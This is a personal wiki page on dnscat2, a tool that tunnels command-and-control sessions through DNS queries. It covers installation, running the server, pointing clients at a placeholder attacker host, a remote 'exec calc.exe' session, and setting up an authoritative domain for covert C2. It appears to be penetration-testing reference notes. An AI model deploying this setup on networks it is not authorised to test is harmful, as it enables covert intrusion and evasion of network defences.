Dnscat
From charlesreid1
Overview
What is it?
dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.
There are two ways of running dnscat2:
- In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.
- In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.
Installing
# apt-get update # apt-get -y install ruby-dev git make g++ # gem install bundler # git clone https://github.com/iagox86/dnscat2.git # cd dnscat2/server # bundle install
Usage
Direct DNS Mode
Running the server
When you run the server, no arguments are required
# ruby ./dnscat2.rb Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]... No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:
# ruby ./dnscat2.rb Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]... No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client) dnscat2> New session established: 12199 dnscat2>
Now, you can connect to the particular interactive session with that number:
dnscat2> session -i 12199 Welcome to a command session! Use 'help' for a list of commands or ^z for the main menu dnscat [command: 12199]> exec calc.exe Sent request to execute dnscat [command: 12199]>
Running the client
On Linux:
./dnscat2.rb --host 101.202.303.404
On Windows:
C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404
Proxy DNS Mode
DNS Setup
The C2 server should be a registered domain, and should be an authoritative DNS server, and the authoritative DNS server should be the same server running the dnscat2 server.
To make a DNS server authoritative for your domain, you will inform the domain registrar of the authoritative DNS in the domain. There is often an option to do this in Domain Management/Domain Settings.
Edit DNS Zone file, and add several records:
- Add two A records
ns1andns2that point to the C2 server - Add two DNS records with host
ns1andns2to point to n1.domain.com and n2.domain.com
Next, make sure the domain is set up to use your own, custom nameservers. Add the nameservers ns1.domain.com and ns2.domain.com). Give some time for settings to take effect.
Now when you run dnscat2 on either machine, you'll specify domain.com
Resources
https://zeltser.com/c2-dns-tunneling/
Github: https://github.com/iagox86/dnscat2
Flags
